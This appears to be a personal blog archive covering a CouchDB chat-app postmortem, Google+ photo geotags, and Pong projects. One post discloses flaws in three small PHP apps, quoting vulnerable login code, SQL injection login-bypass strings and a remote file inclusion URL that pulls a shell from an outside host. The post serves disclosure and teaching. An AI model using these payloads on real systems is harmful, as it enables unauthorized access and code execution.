PillowChat: How Not to Build a Chat Room with jQuery, PHPillow, and CouchDB

After watching J. Chris Anderson show off a CouchDB chat app at an Austin Javascript meeting, I figured Couch might be a good fit for my next large project. Building a clone of my own would be a good way to get familiar with the tech. Since I knew my back end would be PHP, I opted for Kore Nordmann’s PHPillow wrapper after reading some good things on StackOverflow.

Here’s the result:

Structural Overview

Client: jQuery runs in the browser, sending messages and polling the server for new ones. Application settings and state are maintained in the global pillowchat object. Functions beginning with “render” read state information from the global and push it into the DOM.

Server: PHP receives POST requests from the client and handles them in chat.php, sending back JSON messages to the client. There are three CouchDB views defined in views.php for performing the following actions:

  • Getting a list of users
  • Getting recent messages
  • Getting the timestamp on a user’s empty message

Implementation Specifics

CouchDB only stores “message” documents. They contain three properties: Username, tripcode, message, and timestamp. Each message includes a password. The server hashes this into a tripcode that allows users to identify each other without registration. Only the hashes are saved. Mouse over usernames in the chat room to see the tripcodes.

Rather than create a separate document to keep track of users’ most recent activity, I just record timestamps in an empty message document. Every time the client polls for new messages, the empty message document for that client is updated with a timestamp. The getUsers function grabs a list of active users by selecting all the empty message documents with timestamps in the last 5 seconds. Since the views are predefined, you can’t change the timestamp in the request sent to CouchDB. Instead, I return all empty messages and use PHP to loop through the response, looking for the most recent. It seems like there should be a better way to do this.

The Stress Test from Hell

The app looked nice and appeared to work pretty well when I roped in some late night facebook lurkers to test it. Feeling confident in my creation, I showed it off to my neighbor @Kmobs while picking up some cookies from his apartment. The app was in no way prepared for his hordes of CyanogenMod followers. The chat appeared to work okay with about 25 people in the room, but became inaccessible almost immediately after.

All the polling clients hammered the server, maxing out the Linode instance’s CPU and memory.

It’s obvious that something with an event loop like Node.js would have been far more appropriate here. Apache’s processes quickly wiped out the RAM.

There goes 1/3 of my monthly bandwidth.

Linode provides some nice graphs of CPU, bandwidth, and disk IO. They all confirm that the server was swamped. I’m curious to see how a static web page or WordPress install would stand up to this kind of traffic. The trouble didn’t stop there. During the post mortem I saw that the database size had ballooned to a whopping 5.8 GB.

What had I done wrong? Had I stored the message documents in an inefficient way? Was there some kind of bug causing duplicate documents? Probably not. Here’s what I saw when I wrote a view to dump out all the messages:

Some crafty hackers correctly assumed there was no rate limiting and flooded the chat with long spammy messages. The easiest way to do this is probably Chrome’s javascript console. Some sort of shell script would have also worked.

5,939 MB / 35,800 Documents = 169.9 KB per document

The Takeaway

You already know that you shouldn’t trust clients. This truism is an understatement. You should write your server side code with the assumption that your client code is being manipulated by devious bastards. In this case, the server failed to verify message length and message frequency.

Several improvements could make this app scale better.  Websockets are probably better than having clients poll the server every second. When enough people join the chat, the server basically experiences a DDOS attack. Since Websockets don’t really enjoy wide support, the polling method could still be employed in a more conservative manner. Clients could reduce their poll frequency as an inverse function of active users or perform an exponential backoff when their requests time out.

The PHPillow literature base is pretty small. There is a short tutorial on the official site, but it doesn’t cover very many use cases. While the API itself is decently documented, but some more examples would go a long way.

When you create a view in PHPillow, it is stored to CouchDB the first time you execute the code. If you want to modify the view, you must delete the original view in Futon before the changes are stored. This is not a big deal, but it’s frustrating if you don’t know about it. Additionally, I’m not thrilled by the prospect of writing a view every time I want to construct a new type of query. CouchDB is good at selecting ranges, but it’s not immediately apparent how I should locate a document based on 2 string properties, e.g. “firstname=bob&lastname=loblaw”.

The PillowChat source is available on GitHub. It would be fun to see what kind of volume is possible if the aforementioned improvements are implemented. Big thanks to Keyan and the CyanogenMod crowd for the testing.

Edit: You can build a more efficient chat app with far less code using socket.io and node.js. See SocksChat for a simple example.

Resources

http://wiki.apache.org/couchdb/HTTP_view_API
http://wiki.apache.org/couchdb/View_collation#View_Collation
http://arbitracker.org/phpillow/tutorial.html
http://tracker.arbitracker.org/phpillow/api/view/Core/phpillowDateValidator.html
http://tracker.arbitracker.org/phpillow/issue_tracker/issue/11

Miscellany

  • Styling is borrowed from Jérôme Gravel-Niquet‘s backbone.js demo.
  • I have no idea what will happen if you open the demo in Internet Explorer.
  • I changed the name from PillowTalk to PillowChat after I realized someone else on github beat me to the pun.

ATTN Google+ Users: Your Photos Contain Location Data

One of Google+’s much touted features is its ability to automatically slurp photos off of your mobile phone. I’m a big fan of this functionality. It represents a marked improvement in user experience over Facebook. It’s silly that we waste so much time dragging and dropping image files.

Before taking advantage of automatic uploads, users should be aware of some other less obvious features. When viewing a photo, click Actions->Photo Details and you’ll be presented with some neat data:

I assume this information is pulled straight from the EXIF metadata embedded in the image file from the phone. That’s handy, although I’m not really sure what I’m supposed to get out of the histogram. If you click “Location”, you’ll see something even more interesting.

That’s almost exactly where I took the picture. Awesome!
But very close to my apartment. Creepy!

As far as I can tell, control over who sees what is a major selling point of Google+.
The whole Circles concept seems like a user friendly access management system. So I find it a little surprising that sharing a photo is bound, by default, to share location information as well.

I know that the information was already in the EXIF data, I gave the Android application permission to access the phone’s GPS, and there was probably a warning in the terms I agreed to. But 99% of people won’t consider any of that when they share an image from a location they would like to keep private.

To be clear, I think this feature is really cool. Google has taken full advantage of geotagging in a way that provides value to end users. People just need to be aware of what exactly they’re sharing.

Finding 0-day Vulnerabilities in the Ghetto

The woeful security practices of many open source PHP applications constitute a hallmark of the so-called ghetto. I know because I’ve introduced a handful of embarrassing security holes in past open source contributions. These simple mistakes are symptoms highlightling the conditions conducive to large amounts of unknown vulnerabilities.

I conjecture that small PHP applications are the easiest target. Here’s why:

1. Low barrier to entry
When people encourage budding programmers to cut their teeth by working on open source projects, many of them flock to PHP because it’s easy to build useful applications quickly. This is not necessarily bad. I had a blast learning PHP and it definitely contributed to my general interest in software. Just remember that the last web app you downloaded from sourceforge was likely written by a 16 year old with a copy of PHP in 24 hours. Kenny Katzgrau crystallizes this point in a discussion of PHP’s past shortcomings:

In it’s pizza-faced adolescent years (pre-5.0), PHP gained a serious following among novices. The language has a fantastically low barrier to entry, so anyone could get started in 2 minutes by downloading some self-extracting *AMP stack for Windows. […] What do you get when you mix n00bs and a lack of best practices? Unmaintainable garbage. And that’s what proliferated.

2. Lack of oversight

Given enough eyeballs, all bugs are shallow.
–Linus’ Law

The small number of people contributing to little PHP projects fails to satisfy the “eyeballs” supposition in this popular open source trope. There simply aren’t enough people looking at small projects to find even the simplest security problems. Given that general bugs are inevitable, the inexperienced nature of many developers compounds the likelihood that serious security flaws will arise and go undetected.

Consider a small two person project. Neither person really cares enough to personally audit the code. Maybe it’s on someone’s to-do list, but not before adding fun new features or doing laundry. So where does the buck stop? Certainly not with the user. An individual might contribute a bug fix if it causes a visible problem in the software system, but even that’s optimistic. Remember, this is a small project in the realm of 10k lifetime downloads. So the job will likely get picked up by two groups: altruistic security folk who disclose vulnerabilities responsibly and… hacker hackers.

hackers
“The passwords are stored as plaintext!”

Realistically, the white hat security researchers are far less likely to find these holes than their nefarious counterparts. They tend to focus their efforts on larger projects. It’s far more glamorous to find a bug in a big project, say WordPress, or the Linux kernel. To be fair, black hats have a financial incentive to find bugs in large projects, but given the extreme low quality of code in smaller projects, it’s probably a better time trade off to target the little ones.

So these conditions leave the open source community with an abundance of poorly written projects that are only seriously audited by blackhats. Perfect storm much?

Below I highlight vulnerabilities in three small open source applications. When this post was written all vulnerabilities were unknown. The authors were contacted a few weeks ago and said they would fix the problems ASAP. Let’s stroll through the ghetto.

Movie recommendation website

Vulnerability type: SQL Injection
Vulnerable pages: login.php, userSearch.php
The login page only asks for a username. Let’s call it half-factor authentication.

$name=$_POST['username'];
$query = "SELECT * FROM users WHERE username= \"$name\"";
$counter=0;
	foreach ($db->query($query) as $row)
	{
	$name=$row['username'];
	$userid=$row['userid'];
	$counter+=1;
	}	

	if ($counter==1){
		$_SESSION['userid']=$userid;
		$_SESSION['username'] =$name;
		print "Session registered for $name";
	}
	elseif ($counter==0){
		print "No username found for $name.";
	}

	elseif ($counter>1){
		print "That's weird, more than one account was found.";
	}

If we know someone’s username, we’re already golden. Otherwise, we need to get the SQL query to return exactly one row. That’s easy enough with the following username parameter:
" OR "1"="1" LIMIT 1 ;

Gisbee CMS

Vulnerability type: SQL injection
Vulnerable files: beeback 1.0.0/includes/connect.php
This new CMS doesn’t sanitize inputs from the main login form on its home page.

if (isset($_POST['login'])){
	$login = $_POST['login'];
	$pass = md5($_POST['pass']);
	$verif_query = sprintf("SELECT * FROM user WHERE email='$login' AND password='$pass'");
	$verif = mysql_query($verif_query, $db) or die(mysql_error());
	$row_verif = mysql_fetch_assoc($verif);
	$user = mysql_num_rows($verif);

	if ($user) {
		session_register("authentification");
		$_SESSION['role'] = $row_verif['usertype'];
		$_SESSION['lastname'] = $row_verif['lastname'];
		$_SESSION['firstname'] = $row_verif['firstname'];
		$_SESSION['email'] = $row_verif['email'];
	}else{
		$_GET['signstep'] = "failed";
	}
}

If magic quotes are off, we can login with the following username:
1' OR '1'='1'#

reciphp: An open source recipe cms script.

Vulnerability type: Remote file inclusion
Vulnerable files: index.php

if (!isset($_REQUEST['content']))
                   include("main.inc.php");
               else
               {
                   $content = $_REQUEST['content'];
                   $nextpage = $content . ".inc.php";
                   include($nextpage);
               }

If the server’s allow_url_include() option is set, then we can include malicious remote code by crafting the url:
http://[path].com/index.php?content=http://path.com/shell

To be fair to the PHP community, the ghetto has shrunk. But there is a vast divide between the gentrified segment, people who read programming blogs and know why frameworks are good (or bad), and everyone else. I don’t believe there is a complete technical solution, although conservative default settings in php.ini certainly help stave off a fair amount of attacks. The onus is on the community to bring the less fortunate up to speed. If you know a blossoming PHP programmer, take five minutes to explain SQL injection and remote file inclusion. You’ll save someone a lot of trouble.

Pong with the Java 2D API

I’m planning on using the Java 2D API for a project this summer, but I need to get familiarized first. In the previous post I covered Pong on a the C32 microcontroller. Here I’ll look at a desktop implementation using AWT.

A great starting point is this zetcode tutorial on game programming. The author covers a series of classic arcade games. I used their code to figure out how to initialize the Swing JPanel and handle keyboard input.

Here’s my implementation:

Controls
Player 1: Q, A
Player 2: Up, Down
Pause: Space
Restart: Esc

The collision detection code is almost exactly the same as the C version. This version is a little more robust in that it supports arbitrary window sizes, paddle lengths/widths/speeds, and ball velocities. The only real trouble spots were devising a scheme to handle two keys being held down simultaneously and repainting the frame at the correct times. For more fun, consider modifying this version to change the X and Y speeds of the ball based on paddle velocity or collision position.

Here’s the playable jar file and the Eclipse project with the source.

 

Helpful links
http://forums.bit-tech.net/showthread.php?t=159922

Pong on the mc9s12c32

At the conclusion of UT’s embedded systems lab, EE445L, all student teams produce a final project of their own choosing. My partner (Tim) and I built a game system for playing Pong.

I designed the circuit schematic and wrote most of the software. Tim designed the PCB and assembled most of the hardware. Everything that could go wrong did, but we managed to build a fun little game.

The finished product

The interface is extremely intuitive. The potentiometers on either side of the screen control the paddles for each player. The code for the C32 is almost entirely C and was developed in Freescale’s CodeWarrior IDE.

The screen is an AGM1264 128×64 monochrome LCD. Professor Jonathan Valvano provides a useful driver for the c32 on his website. While the driver supports writing whole bitmaps, the memory layout of the LCD makes it very tricky to draw 2D shapes at arbitrary coordinates. I ended up using a 1-pixel ball because a 2×2 ball could require writes to 4 memory locations, a can of worms that I did not want to open.

But, if you’re interested in improving the game, you can draw to arbitrary pixels using the modulus arithmetic in drawBall(). It could easily be a jumping off point for a 2D graphics library supporting more interesting shapes. A word of warning: you will get a noticeable flicker when writing bitmaps quickly (we did 20 fps). The screen really isn’t built to draw every location continuously.

Edit: I had a conversation with another student who attributed the flicker to a call to LCD_Clear(0) in Valvano’s LCD_DrawImage routine. It’s there in LCD.c on line 383. I no longer have the hardware, but that would have been an easy fix to make.

Things that went wrong

  • The seventh wire in the ribbon cable was broken, resulting in garbage on LCD. I tracked this down with a multimeter and patience.
  • I forgot to right justify the 10-bit ADC inputs on the potentiometers. This should have been obvious when the values read were greater than 1023. The fix: ATDCTL5= channel + 0x80;
  • The original box we ordered was just barely too small. Tim measured the LCD’s bezel, rather than its slightly wider PCB. I didn’t double check it. We ended up using the obnoxiously large black box in the picture.
  • The black button unexpectedly employed negative logic. That is, pressing it opens the circuit. This was trivial to deal with in software, but annoying nonetheless.
  • The power switch broke. Our nice metal toggle switch broke into pieces when I bumped it on the table. I decided to short the wires in the interest of time.
  • Tim was unaware that capacitors may be polarized and soldered them in randomly. He is now very good with solder wick.
  • The potentiometers are a little longer than the screen is wide. It would be better to have a perfect 1:1 correspondence.
  • There is a strange bug with the LCD hardware or driver that causes a few pixels near the lower left corner to erroneously become dark. Hence the name, “Distortion Pong”. I tried to convince the TA it was feature, but I don’t think he bought it.

 

Check out the hastily written source.

This project wouldn’t have been possible without the technical guidance of Darryl Goodnight, Paul Landers, and Justin Capogna.

If this post tickled your fancy, check out my Java version of pong. The functionality is nearly identical, but the code is much nicer.